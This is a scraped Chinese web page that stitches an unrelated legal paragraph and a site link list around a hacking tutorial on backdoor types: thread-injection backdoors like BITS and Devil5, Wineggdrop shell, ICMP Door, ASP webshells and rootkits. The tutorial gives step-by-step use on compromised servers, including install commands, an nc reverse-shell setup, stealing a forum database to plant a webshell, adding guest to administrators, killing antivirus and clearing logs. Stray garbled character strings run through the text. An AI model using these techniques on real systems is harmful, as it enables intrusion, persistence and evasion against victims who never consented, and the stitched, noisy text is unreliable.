本罪主體是一般主體,凡達到法定刑事責任年齡、具有刑事責任能力的自然人均能構成本罪。本罪追究的主要是傳銷的組織策劃者。多次介紹、誘騙、脅迫他人加入傳銷組織的積極參與者。對一般參加者,則不予追究。

⑨ 後門程序的分類

後門可以按照很多方式來分類,標准不同自然分類就不同,為了便於大家理解,我們從技術方面來考慮後門程序的分類方法: 此類後門程序一般都是伺服器上正常 的web服務來構造自己的連接方式,比如非常流行的ASP、cgi腳本後門等。
網頁後門,網路上針對系統漏洞的攻擊事件漸漸少了,因為大家在認識到網路安全的重要性之後,最簡單卻又最有效的防護辦法:升級,都被大家所認同,所以系統漏洞在以後的歲月中存活的周期會越來越短,而從最近的趨勢來看,腳本漏洞已經漸漸取代了系統漏洞的地位,非常多的人開始研究起腳本漏洞來,sql注入也開始成為各大安全站點首要關注熱點,找到提升許可權的突破口,進而拿到伺服器的系統許可權。
asp、CGI、PHP這三個腳本大類在網路上的普遍運用帶來了腳本後門在這三方面的發展。
線程插入後門
利用系統自身的某個服務或者線程,將後門程序插入到其中,具體原理原來《黑客防線》曾具體講解過,感興趣的朋友可以查閱。這也是現在最流行的一個後門技術。
擴展後門
所謂的「擴展」,是指在功能上有大的提升,比普通的單一功能的後門有很強的使用性,這種後門本身就相當於一個小的安全工具包,能實現非常多的常見安全功能,適合新手使用————但是,功能越強,個人覺得反而脫離了後門「隱蔽」的初衷,具體看法就看各位使用者的喜好了。
c/s後門
和傳統的木馬程序類似的控制方法,採用「客戶端/服務端」的控制方式,通過某種特定的訪問方式來啟動後門進而控制伺服器。
root kit 6o f3H 3B
這個需要單獨說明,其實把它單獨列一個類在這里是不太恰當的,但是,root kit的出現大大改變了後門程序的思維角度和使用理念,可以說一個好的root kit就是一個完全的系統殺手!後文我們講涉及到這方面,一定不會讓大家失望!
上面是按照技術做的分類,除了這些方面,正向連接後門、反向連接後門等分類也是很常見的,其實如何分類是編程者考慮的事,廣大的使用者就不用考慮那麼多了,我們看重的,只是功能! 首先我們來簡單解釋一下什麼是典型的線程插入後門:這種後門在運行時沒有進程,所有網路操作均播入到其他應用程序的進程中完成。也就是說,即使受控制端安裝的防火牆擁有「應用程序訪問許可權」的功能,也不能對這樣的後門進行有效的警告和攔截,也就使對方的防火牆形同虛設了!因為對它的查殺比較困難,這種後門本身的功能比較強大,是「居中家旅行、入侵攻擊」的必備品哦!
這類的典範就是國內提倡網路共享的小榕的BITS了,從它的推出以來,各類安全工具下載園地里BITS就高居榜首,非常多的朋友使用它的過程中感到了方便。類型:系統後門
使用范圍:wind200/xp/2003
隱蔽程序:★★★★☆
使用難度:★★★☆☆
查殺難度:★★★★☆
BITS其實是Background Intelligent Transfer Servicer的縮寫,可以在不知不覺中實現另一種意義的典型的線程插入後門,有以下特點:進程管理器中看不到;平時沒有埠,只是在系統中充當卧底的角色;提供正向連接和反向連接兩種功能;僅適合用於windows 200/xp/2003。
運用舉例
首先我們用3389登錄上肉雞,確定你有SYSTEM的許可權,將BITS.DLL拷貝到伺服器上,執行CMD命令: 4 #R Br A
rundll32.exebits.dll,install
這樣就激活了BIST,程序用這個特徵的字元來辨認使用者,也就相當於你的密碼了,然後卸載:rundll32.exe BITS.dll,Uninstall
這是最簡單的使用,這個後門除了隱蔽性好外,還有兩大特點是非常 值得借鑒的:埠復用和正反向連接。雖然很多朋友經常聽到這兩個名詞,但並不了解它們,埠復用就是利用系統正常的TCP埠通訊和控制,比如80、139等,這樣的後門有個非常 大的好處就是非常 隱蔽,不用自己開埠也不會暴露自己的訪問,因為通訊本身就是系統的正常訪問!另一個是反向連接,這個很常 見,也是後門中一個經典思路,因為從伺服器上主動方問外邊是不被禁止的,很多很歷害的防火牆就怕這點!
BITS的正向連接很簡單,大家可以參考它的README,這種方式在伺服器沒有防火牆等措施的時候很管用,可以方便地連接,但是遇到有防火牆這樣的方式就不靈了,得使用下面的反向連接方式: 70 +g3l
在本地使用NC監聽(如:nc -l -p 1234)
用NC連接目標主機的任何一個防火牆允許的TCP埠(80/139/445……)
輸入激活命令:[email=hkfx@dancewithdolphin[rxell]:1.1.1.1:2222]hkfx@dancewithdolphin[rxell]:1.1.1.1:2222[/email] ^q/hQ , 4
目標主機的CMD將會出現NC監聽的埠2222,這樣就實現了繞過防火牆的功能了。 所謂的擴展後門,在普通意義上理解,可以看成是將非常多的功能集成到了後門里,讓後門本身就可以實現很多功能,方便直接控制肉雞或者伺服器,這類的後門非常受初學者的喜愛,通常集成了文件上傳/下載、系統用戶檢測、HTTP訪問、終端安裝、埠開放、啟動/停止服務等功能,本身就是個小的工具包,功能強大。
Wineggdroup shell j;類型:系統後門
使用范圍:win2000/xp/2003
隱蔽程度:★★★★☆
使用難度:★★☆☆☆
危害程度:★★★★☆
查殺難度:★★★★☆
這個後門是擴展後門中很有代表性的一個,功能這全面讓人嘆為觀止,它能實現如下比較有特色的功能:進程管理,可查看,殺進程(支持用進程名或PID來殺進程);注冊表管現(查看,刪除,增加等功能);服務管理(停止,啟動,枚舉,配置,刪除服務等功能)埠到程序關聯功能(fport);系統重啟,關電源,注銷等功能(reboot,poweroff,shutdown,logoff);嗅探密碼功能;安裝終端,修改終端埠功能;埠重定向功能(多線程,並且可限制連接者IP);HTTP服務功能(多線程,並且可限制連接者IP);Socd5代理功能(支持兩種不同方式驗證,可限制連接者IP);克隆賬號,檢測克隆賬戶功能(clone,checkclone);加強了的FindpassWord功能(可以得到所有登錄用戶,包括使用克隆賬戶遠程登錄用戶密碼);HTTP代理(完全匿名,支持oicq、 MSN、mirc等程序);其他輔助功能,http下載,刪除日誌,系統信息,恢復常用關聯,枚舉系統賬戶等。
當網路上剛推出這個後門的時候,非常多的人用它來替換自己原來使用的後門,一時間各處贊揚之聲迭起,但多為一些普通的打撈手的心聲,其實它和「後門」的原始定義是有出入的:一旦你需要實現越多的功能,那你的程序在執行、隱藏、穩定等方面就需要考慮非常多的問題,一個疏忽就會導致全盤皆敗,所以不建議將此後門用在需要非常隱蔽的地方。
運用舉例
在安裝後門前,需要使用它自帶的EditServer.exe程序對服務端進行非常詳細的配置,從10個具體配置中,包括了插入線程、密碼、IP登錄郵件通告等方面,不難看出它的功能是非常強大的,隱蔽性也很強,下面說幾個在入侵中常用的功能,相信經常玩入侵的朋友一定能發現它的強大之處:
Fport:列出進程到埠的列表,用於發現系統中運行程序所對應的埠,可以用來檢測常見的隱蔽的後門。
Reboot:重啟系統,如果你上傳並運行了其他後門程序,並需要重啟機器以便讓後門正常工作,那使用這個命令吧! Uz
Shell:得到一個Dos Shell,這個不多講了,直接得到伺服器或者肉雞上的cmd shell。
Pskill PID或程序名:用於殺掉特定的服務,比如殺毒軟體或者是防火牆。
Execute程序:在後台中執行程序,比如sniffer等。http://ip/文件名 保存文件名:下載程序,直接從網上down一個後門到伺服器上。
Installterm埠:在沒有安裝終端服務的win2k服務版的系統中安裝終端服務,重啟系統後才生效,並可以自定義連接埠,比如不用3389而用其他埠。
StopService/StartService:停止或者啟動某個系統服務,比如telnet。
CleanEvent:刪除系統日誌。
Redirect:TCP數據轉發,這個功能是後門程序中非常出色的一個功能,可以通過某一埠的數據轉發來控制內網的機器,在滲透入侵的時候非常管用!
EnumService:列舉所有自動啟動的服務的資料,比如後門、木馬。
RegEdit:進入注冊表操作模式,熟悉注冊表的使用者終於在後門中找到了福音! !
Findpassword:得到所有登錄用戶密碼,比我們常用的findpass功能可強多了。
總體來講,Wineggdrop shell是後門程序中很出彩的一個,它經過作者幾次大規模的修改和升級,已經趨於穩定,功能的強大當然沒得說,但是由於功能太強大,被查殺和懷疑是難以避免的,所以很多人在使用Wineggdrop shell一段時間後就發現肉雞飛了,其實是很正常的事,我你出不用氣餒,其實用很簡單的方法就可以很好地提高它的隱蔽性,下文將有說明。
相對於Wineggdrop shell來說,獨孤劍客的winshell在功能上就不那麼全面了,但是筆者推薦新手更多的使用winshell而不是Wineggdrop shell,因為winshell功能除了獲得一個shell以外,只加入了一些重啟、關閉伺服器的命令,功能相對簡單,但完全使用系統自帶的cmd來執行命令,對系統學習和掌握也是非常有幫助的!
Winshell和wolf這兩者都是國內早期頂尖的後門程序,程序的編制無疑是非常經典的,新手學習時使用這兩款後門一定能讓你明白很多系統相關東西,了解很多入侵思路和方法。 傳統的木馬程序常常使用C/S構架,這樣的構架很方便控制,也在一定程度上避免了「萬能密碼」的情況出現,對後門私有化有一定的貢獻,這方面分類比較模糊,很多後門可以歸結到此類中,比如較巧妙的就是ICMP Door了
類型:系統後門
使用范圍:win2000/xp/2003 2Z6
隱蔽程度:★★★★★
使用難度:★★★☆☆
危害程度:★★★★☆
查殺難度:★★★★★
這個後門利用ICMP通道進行通信,所以不開任何埠,只是利用系統本身的ICMP包進行控制安裝成系統服務後,開機自動運行,可以穿透很多防火牆——很明顯可以看出它的最大特點:不開任何埠~只通過ICMP控制!和上面任何一款後門程序相比,它的控制方式是很特殊的,連80埠都不用開放,不得不佩服務程序編制都在這方面獨特的思維角度和眼光!
運用舉例
這個後門其實用途最廣的地方在於突破網關後對內網計算機的控制,因為很多機密數據都是放在內網計算機上的,而控制內網計算機並不是我們想到位的商業網路進行入侵檢測,它的網路內部並不像我們常見的內網那樣非常容易入侵和控制,因為該公司本身涉及到一些網路安全的服務,所以內網個人計算機的防護是很到位的,在嘗試過很多後門後,最後ICMP Door幫我實現了成功的滲透內網!由此筆者開始愛上這個後門。
首先使用icmpsrv.exe -install參數進行後門的安裝,再使用icmpsend.exe IP進行控制,可以用:[http://xxx.xxx.xxx/admin.exe-hkfx.exe]方式下載文件,保存在[url=file://\system32]\system32[/url]目錄下,文件名為hkfx.exe,程序名前的「-」不能省去,使用[pslist]還可以列出遠程主機的進程名稱和pid,再使用[pskill id]就可以殺進程了,同樣,輸入普通cmd命令,則遠程主機也就執行了相關的命令。 ~HF1 ? %
這個後門是採用的c/s構架,必須要使用icmpsend才能激活伺服器,但是他也有自己的先天不足:後門依靠ICMP進行通訊,經過沖擊波的洗禮後,很少有伺服器還接受ICMP包了,很多都屏蔽掉了它,所以用它來控制伺服器不是一個好辦法,這也是我為什麼用它來控制內網計算機的原因了——內網很少有人屏蔽ICMP包吧? 這是ASP腳本方面流傳非常廣的一個腳本後門了,在經過幾次大的改革後,推出了「海陽頂端ASP木馬XP版」、「海陽頂端ASP木馬紅粉佳人版」等功能強大、使用方便的後門,想必經常接觸腳本安全的朋友對這些都不會陌生。類型:網頁木馬
使用范圍:支持ASP、WEB訪問
使用難度:★☆☆☆☆
危害程序:★★★☆☆
查殺難度:★★★☆☆
伺服器系統配置都相對安全,公開的系統漏洞存在的機會很少,於是腳本方面的漏洞就開始火起來。首先我們通過某種途徑獲得一個伺服器的頁面許可權(比如利用論壇上傳達室類型未嚴格設置、SQL注入後獲得ASP系統的上傳許可權、對已知物理路徑的伺服器上傳特定程序),然後我們可以通過簡單的上傳ASP程序或者是直接復制海陽項端的代碼,然後通過WEB訪問這個程序,就能很方便地查閱伺服器上的資料了,下面舉個簡單的便子(由於只是簡單的介紹,下文便子不會太難或者太普遍,希望大家理解)。
leadbbs2.77曾經風靡網路,它是個很典型的ASP論壇,屏蔽了很多可以SQL注入的寺方,但是很多傻瓜級別的網路管理員總是喜歡默認安裝,然後啟用論壇,我們只需要很簡單地在IE中輸入:WWW。***。COM/BBS/DATA/LEADBBS。MDB就能夠直接下載該論壇的資料庫了,而且沒有MD5加密哦!,我們直接找到管理員的賬戶和密碼,然後登錄論壇,到管理界面將論壇的「聯系我們」、「幫助」等ASP文件替換成我們的海陽項端代碼,然後執行GUEST許可權的CMD命令,方便的上傳/下載將定程序、遠程執行程序等,這樣一個隱藏的後門就建好了!取得伺服器的SYSTEM許可權就看大家自己的辦法了。
一般來講,海洋的功能是非常強大的,而且不容易被查殺(一個朋友採取的方式是:先利用某個腳本漏洞上傳網頁後門,再通過海洋上傳另一個後門到隱蔽的路徑,然後通過最後上傳的後門來刪除第一次上傳的海洋,這樣後門的存放路徑就可以放得非常深了,普通管理員是很難發現的),如果管理員覺得自己可能中了這里邊樣的後門,可以利用論壇備份來恢復自己的頁面系統,再配合系統日誌、論壇日誌等程序檢查系統,發現可疑ASP文件打開看看海洋是很好識別的,再刪除就可以了。
腳本方面的後門還有CGI和PHP兩面三刀大類,使用原理都差不多,這里就不再多介紹,在黑防論壇也收錄了這三種後門,大家可以下載後自己研究。 類型:系統後門
使用范圍:win200/xp/2003
隱蔽程度:★★★★☆
使用難度:★★☆☆☆
危害程序:★★★★☆
查殺難度:★★★☆☆
同BITS一樣,Devil5也是線程插入式的後門,和BITS不同的是它可以很方便的在GUI界面下按照自己的使用習慣定製埠和需要插入的線程,適合對系統有一定了解的使用都使用,由於是自定義插入線程,所以它更難被查殺,下面我們來看看它的使用。
道德使用它自帶的配置程序EDITDEVIL5.EXE對後門進行常規的配置,包括控制埠、插入線程、連接密碼、時間間隔等方面關鍵點是對插入線程的定製,一般設置成系統自帶的SVCHOST,然後運行後門就可以控制了。
我們用TELNET連接上去,連接的格式是:TELNET *** 定製的埠,它和其他後門不同之處在於連接後沒有提示的界面,每次執行程序也是分開的,必須要每次都有輸入密碼,比如我們丟掉了伺服器和管賬戶,可以激活GUEST後再將GUEST加到管理員許可權,記得每次執行命令後加上「>密碼」就可以了:net localgroup administrators guest /add >hkfx,然後你又可以控制伺服器了。
很明顯示,同榕哥的BITS相比,DEVIL5有一些缺陷:不能通過系統自帶埠通訊、執行命令比較麻煩,需要每次輸入密碼而且不回顯示輸入內容,很容易出錯。但是,它有自己的優勢:插入線程可以自已定製,比如設置IE的線程為插入的目標就比較難被查殺:自己提供了專門的查殺工具DELDEVIL5.exe,幫助防護者清理系統;而且它可以任意改名和綁定,使用靈活性上比BITS強……大家選擇哪能款就看自己的喜好了。
另外,PortLess BackDoor等工具也是此類的後門,功能強大,隱蔽性稍差,大家有興趣可以自己研究一下。 如果說上面的後門程序都各有千秋、各有所長的話,它們和經典的root kit 一比簡直就是小巫見大巫了,那究竟什麼樣是root kit呢?
root kit出現於20世紀90年代初,在1994年2月的一篇安全咨詢報告中首先使用了root kit這個名詞。從出現至今,root kit 的技術發展非常迅速,應用越來越廣泛,檢測難度也越來越大。其中釷對SunOS和Linux兩種操作系統的root kit最多。
很多人有一個誤解,他們認為root kit 是用作獲得系統root訪問許可權的工具。實際上,root kit是攻擊都用來隱蔽自己的蹤跡和保留root訪問許可權的工具。通常,攻擊者通過遠程攻擊獲得root訪問許可權,進入系統後,攻擊者會在侵入的主機中安裝root kit,然後他將經常通過root kit的後門檢查系統是否有其他的用戶登錄,如果只有自己,攻擊者就開始著手清理日誌中的有關信息。通過root kit的嗅探器獲得其他系統的用戶和密碼之後,攻擊者就會利用這些信息侵入其他系統。
從*nix系統上遷移到windows系統下的root kit完全沿襲了這些「可怕」的功能!網路上常見的root kit 是內核級後門軟體,用戶可以通過它隱藏文件、進程、系統服、系統驅動、注冊表鍵和鍵值、打開的埠以及虛構可用磁碟窨。程序同時也在內存中偽裝它所做的改動,並且隱身地控制被隱藏進程。程序安裝隱藏後門,注冊隱藏系統服務並且安裝系統驅動。該後門技術允許植入reDirector,是非常難以查殺的一個東東,讓很多網路管員非常頭疼!

熱點內容
美發店認證 發布:2021-03-16 21:43:38 瀏覽:443
物業糾紛原因 發布:2021-03-16 21:42:46 瀏覽:474
全國著名不孕不育醫院 發布:2021-03-16 21:42:24 瀏覽:679
知名明星確診 發布:2021-03-16 21:42:04 瀏覽:14
ipad大專有用嗎 發布:2021-03-16 21:40:58 瀏覽:670
公務員協議班值得嗎 發布:2021-03-16 21:40:00 瀏覽:21
知名書店品牌 發布:2021-03-16 21:39:09 瀏覽:949
q雷授權碼在哪裡買 發布:2021-03-16 21:38:44 瀏覽:852
圖書天貓轉讓 發布:2021-03-16 21:38:26 瀏覽:707
寶寶水杯品牌 發布:2021-03-16 21:35:56 瀏覽:837